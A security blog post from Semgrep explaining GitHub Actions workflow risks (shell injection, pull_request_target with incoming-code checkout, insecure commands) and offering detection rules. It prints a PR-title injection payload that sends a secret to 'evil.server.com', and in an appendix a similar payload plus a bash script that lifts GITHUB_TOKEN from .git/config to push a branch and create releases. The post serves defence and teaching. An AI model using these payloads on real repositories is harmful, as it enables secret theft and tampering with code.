Protect Your GitHub Actions with Semgrep

by Grayson Hardaway on October 01, 2021

semgrep --config p/github-actions

❗ Demo repository for this post: https://github.com/minusworld-gha-demo/shell-injection. If you fork this repository, make sure you delete it when you’re done!

GitHub Actions keep me up at night.

GitHub Actions keep me up at night

I worry that a malicious actor will use GitHub Actions to inject code into one of my repositories unbeknownst to me.

Before doing the deep dive that resulted in this post, I didn’t understand in detail what GitHub Actions had access to, which made me nervous. This fear only heightened as I came across various security advisories for GitHub Actions, like this one and this one, prompting me to look into the system to make sure we weren’t exposing ourselves to obvious attacks. My ultimate goal was to use Semgrep’s YAML support to write Semgrep rules for detecting, and ultimately preventing, vulnerabilities in our GitHub Actions workflows.

Fortunately, GitHub Security Lab already had some phenomenal research into GitHub Actions (GHA) vulnerabilities. Their three-part series covers the security implications of the pull_request_target trigger in part 1, injection attacks in part 2, and supply chain considerations when using third-party Actions in part 3. If you’re unfamiliar with the security implications of GHA like I was, I highly recommend the series—in addition to the security hardening docs for GHA.

Impact of a compromised GitHub Action

Broadly speaking, GHA runners are ephemeral workers that interact with the repository in some way. Some runners use workflows that only interact with the repository passively, such as those that build the project. Others interact actively with the repository in order to do things such as leave automated pull request comments or format the code.

There are two primary security concerns with a compromised runner: stolen secrets and unwanted modifications to the repository.

Stolen secrets

The secrets available to a runner differ based on its context. Generally speaking, any secrets exposed via environment variables are targets for theft. The impact of stolen secrets is limited to whatever access the secrets give. If AWS credentials were stolen, an attacker would have the same access as those credentials; if the https://semgrep.dev token we issue for CI scans were stolen, an attacker would have access to that organization’s Semgrep findings.

Unwanted repository modifications

An attacker can also make modifications to your code if they compromise a runner with write permissions to your repository. This is tantamount to any other code injection vulnerability for users of your code — an attacker could add their own malicious code surreptitiously which runs whenever your code runs. For an attacker to make modifications, they need to obtain GitHub credentials with write permissions to the repository. One way to do this is to steal a runner’s GITHUB_TOKEN. A GITHUB_TOKEN is a special token for the GHA runner granting it privileges to interact with the repository. GITHUB_TOKENs are temporary; they are generated when the workflow starts and expire as soon as the workflow is finished.

Generally, you don’t have to worry about some random PR action making modifications to your repository if the submitter doesn’t already have write access. GITHUB_TOKENs have thoughtful permissions that do not grant write access to runners activated by the pull_request trigger from forked repositories. There are, however, some conditions with the pull_request_target trigger that enable a random PR to make modifications. The pull_request_target section in this post discusses this in more detail.

You must also be mindful of other workflow triggers. For example, the issues trigger in a GHA workflow file fires when anyone files an issue on your repository and creates a runner where theGITHUB_TOKEN has write permissions. If an attacker can compromise such a runner, they could steal that GITHUB_TOKEN and make modifications to the repository.

Other ways to give a runner write permissions include personal access tokens or users’ SSH keys. These methods are generally discouraged.

In summary:

  • Secrets can be stolen via compromised runners in some circumstances.

    • Generally, secrets are exposed via environment variables.
    • A runner with elevated permissions could read repository secrets.
  • A repository can be surreptitiously modified in some circumstances if a compromised runner has write permissions to the repository.

    • Runners have GITHUB_TOKENs with write permissions on some workflow triggers like issues, pull_request_target, and others, but not on pull_request from forks.
    • Runners have write permissions if given a user’s authentication method, such as a personal access token or SSH key, with write access to the repository.

During EkoParty 2020’s GitHub CTF, players were able to compromise a GHA runner and exfiltrate repository secrets containing the flag. Check out the awesome writeup here to see what a runner compromise might look like in the real world. And, check out GitHub’s own section on the impact of compromised runners for additional information.

Shell injection

The most direct way a GHA runner could be compromised is with a shell injection. GHA workflow files let authors write a custom shell script using the run: key. Authors can insert dynamic data into the script using the delimiters ${{ ... }}. For example, you can insert the pull request title like this: ${{ github.event.pull_request.title }}. This inserted data is not always trustworthy and an attacker can use it to inject arbitrary code into the action.

Anything starting with github. is part of the GitHub context. Some of the context’s properties, such as github.event.pull_request_title, are user-controllable (and therefore untrustworthy). GitHub Security Lab lists a set of properties that can contain untrusted input, and if any of these properties are inserted directly into a run script, you have a shell injection vulnerability. An attacker can craft a malicious PR title, email address, or even branch name to inject arbitrary code into the script.

Imagine an attacker trying to steal secrets from a runner that sends notifications about new PRs to some service. A workflow step POSTs the PR title to the notification service, using a SERVICE_SECRET as authorization for the request. The POST request happens in a run script where the PR title is obtained using ${{ github.event.pull_request.title }}. An attacker could create a malicious PR title like

";curl http://evil.server.com?token=$SERVICE_SECRET;x="

to exfiltrate the SERVICE_SECRET. Now, the attacker has all the privileges of the SERVICE_SECRET. Hypothetically, if the notification service were AWS’s Simple Notification Service (SNS) and the SERVICE_SECRET authorized a highly privileged role on the AWS account, the attacker would have successfully compromised the AWS account.

Exfiltrating a secret from a GHA runner with a malicious PR title

If you’re curious to try this for yourself, you can exploit the shell-injection workflow at this demo repository that I set up while writing this post. Be sure to delete your fork if you make one!

Scan your GHA workflows for this shell injection vulnerability with this new Semgrep rule.

To mitigate this vulnerability, place data from the GitHub context into an environment variable first, then use the environment variable in the run script. This works because the ${{ ... }} syntax is interpolated into a script file before the runner begins execution, inserting the contents directly as if it were script code. By using an environment variable, the data is inserted while the script is already running, preventing influence over the script code itself.

⚠️ The run script is not the only location for introducing a vulnerability. If any third-party Action, written in any language, uses these properties in an unsafe way then a GHA runner using that Action can be compromised. For an example, I refer you once again to this EkoParty GitHub CTF challenge, which injects ${{ github.event.issue.body }} into a call to os.system(...) in a Python script via environment variables. 😱 So, even though environment variables are safe for run scripts, they’re not safe for everything! ☠️

pull_request_target

An indirect vehicle for compromise is via [pull_request_target](https://docs.github.com/en/actions/reference/events-that-trigger-workflows#pull_request_target). This workflow trigger behaves just like its sibling, pull_request, except that the GHA runner runs in the context of the target repository. To be explicit, the target repository is the repository that the pull request is attempting to merge code into. This repository is distinct from forks, which are totally independent from their original repositories.

GHA runners triggered with pull_request_target have two properties that are relevant for this section:

  1. The runner uses the code of the target repository, not the incoming pull request’s repository
  2. The runner uses the environment (think: secrets and write permissions) of the target repository, not the incoming pull request’s repository

Because of (1), using pull_request_target is usually safe from malicious attempts to abuse (2) because it does not use the incoming pull requests’s code. However, if the runner were to explicitly check out and use the incoming pull requests’s code... well, then we’ve violated (1), and now we’re in dangerous territory. 😵

I see no way this could possibly go wrong

There are a lot of components in play, so let me summarize:

  • The pull_request trigger uses incoming code but does not have write permissions or access to the target repo’s secrets.
  • The pull_request_target trigger uses the target code and does have write permissions and access to the target repo’s secrets.
  • Therefore, the dangerous situation here is explicitly checking out the incoming code, because it now has write permissions and access to the target repo’s secrets.

A GHA workflow can check out the incoming code in a variety of ways, the most common of which is with the actions/checkout Action. If the GHA workflow 1) uses pull_request_target, and 2) checks out the incoming code, we’re really flirting with disaster—the only thing needed to enable full runner compromise is a workflow step that executes any part of the incoming code. make, npm install, and python setup.py install are all examples of executable code which an attacker would have influence over. Simply modify one of the relevant files, make an incoming pull request, and the GHA runner is compromised.

Scan your workflow files for explicit checkouts of incoming code with the pull_request_target trigger using this new Semgrep rule.

To be clear, not every instance of pull_request_target paired with checking out incoming code is a vulnerability. If the workflow does not run any of the incoming code, then it is safe. However, this pair of patterns is an indicator of dangerous behavior and should be audited very closely. I suggest using this Semgrep rule to scan your GHA workflows and very closely review any findings.

In general, don’t use pull_request_target unless you need to and can verify that you’re not running anything from the incoming code.

Branch protections provide a decent safeguard against an attacker directly committing malicious code to your repository. While trying to exploit the explicit-checkout workflow in the demo repo, I set branch protections to see how easy it would be to work around. When trying to commit directly to the main branch, a review was still required even though I had write permissions. And, if I used my permissions to approve a pull request with malicious content, it was approved as the user github-actions, not a repository owner, and therefore did not count toward the review requirement. However, I was still able to create arbitrary release objects.

GHSA-g86g-chm8-7r2p is an actual occurrence of this vulnerability in the wild; the researcher published a great read on the specifics of the vulnerability and demonstrates why checking out incoming code with pull_request_target is dangerous.

Also, if you want to investigate the behavior of pull_request_target for yourself, you can try to exploit the explicit-checkout workflow in this demo repository I set up while writing this post. Make sure to delete your fork if you make one!

⚠ ️Incoming code can be checked out in many ways, not just with the checkout Action, such as with a shell script using an explicit git checkout command. If you need pull_request_target, make sure none of your third-party Actions check out the incoming code!

ACTIONS_ALLOW_UNSECURE_COMMANDS

Not only will this kill you, it will hurt you the whole time you are dying

As the name implies, ACTIONS_ALLOW_UNSECURE_COMMANDS is an environment variable in GHA runners that, if set, permits the use of the insecure commands set-env and add-path. GitHub deprecated these commands when it became clear that the implementation was insecure and an alternative called Environment Files were created. From the GitHub Security Advisory on these commands: “Workarounds: None, it is strongly suggested that you upgrade as soon as possible.”

ACTIONS_ALLOW_UNSECURE_COMMANDS was kept for backward compatibility, but should never be used. Use Environment Files instead, and use this Semgrep rule to scan for this variable.

Closing thoughts

I’ve deployed these Semgrep rules on our repositories to continuously scan for any egregious violations (there were none! 🙌 ) and I hope that you’ll find them useful as well. There are probably other exploits, but this covers the most obvious cases. Still, always employ common sense precautions like treating GitHub context data as untrusted input and setting branch protections on your default branch.

That said, the GHA ecosystem is pretty wild, and these rules are only protecting us from making our own mistakes — this does little to guard us against transient dependency issues in third-party Actions. We’ll be auditing our third-party Actions right away and we encourage everyone to do the same!

Appendix A: A crash course in GITHUB_TOKEN permissions

While experimenting with the demo repo, I discovered that the GITHUB_TOKEN can only make what GitHub esoterically calls server-to-server requests to the GitHub API. Some requests that I made, like trying to remove branch protections, were met with an error that simply read, “Resource not accessible by integration”. (This is the only resource I could find mentioning user-to-server requests, but I couldn’t find anything about server-to-server.)

While experimenting with permissions on the demo repo, I realized that entries in this GITHUB_TOKEN permissions table corresponds to sections on this API reference for GitHub App permissions. Sure enough, any API call in the contents section, pull requests section, or any other section with a corresponding row in the GITHUB_TOKEN permissions table was accessible with a GITHUB_TOKEN that had write permissions. I can only assume these are server-to-server requests. Anything not listed in the GITHUB_TOKEN permissions table was not accessible to me, and I assume are called user-to-server requests which require a different kind of authorization.

Anyway, the important takeaway is that the GITHUB_TOKEN permissions table plus the API reference spell out exactly what is accessible with a GITHUB_TOKEN. You can use these resources to understand what a compromised GITHUB_TOKEN has access to.

GITHUB_TOKEN permissions and API routes it can access

Appendix B: Payloads for demo repo

shell-injection

";echo $SERVICE_SECRET;curl http://example.com?token=$SERVICE_SECRET;x="
Image of the shell-injection payload in a GitHub PR title

explicit-checkout

#!/usr/bin/env bash

# overwrite './build' with this script to exploit explicit-checkout

# actions/checkout stores the GITHUB_TOKEN in a file called .git/config
authfield=$(cat .git/config | grep AUTHORIZATION | cut -d':' -f 2)

SIDE_BRANCH="a-side-branch"
RELEASE="v1.0.6"

# Create content in a side branch
# Since there's an explicit checkout of incoming code, this
# will actually be the incoming git repository. Any contents
# in the incoming repository will be in this side branch
git checkout -b $SIDE_BRANCH
git push origin $SIDE_BRANCH

commit_hash=$(git rev-parse HEAD)

# Create a tag using the side branch
curl --request POST \
  --url https://api.github.com/repos/minusworld-gha-demo/shell-injection/git/refs \
  --header "Authorization: $authfield" \
  --header "Accept: application/vnd.github.v3+json" \
  --data "{ \"ref\": \"refs/tags/$RELEASE\", \"sha\": \"$commit_hash\" }"

# Create release
curl --request POST \
  --url https://api.github.com/repos/minusworld-gha-demo/shell-injection/releases \
  --header "Authorization: $authfield" \
  --header "Accept: application/vnd.github.v3+json" \
  --data "{ \"tag_name\": \"$RELEASE\", \"target_commitish\": \"$commit_hash\" }"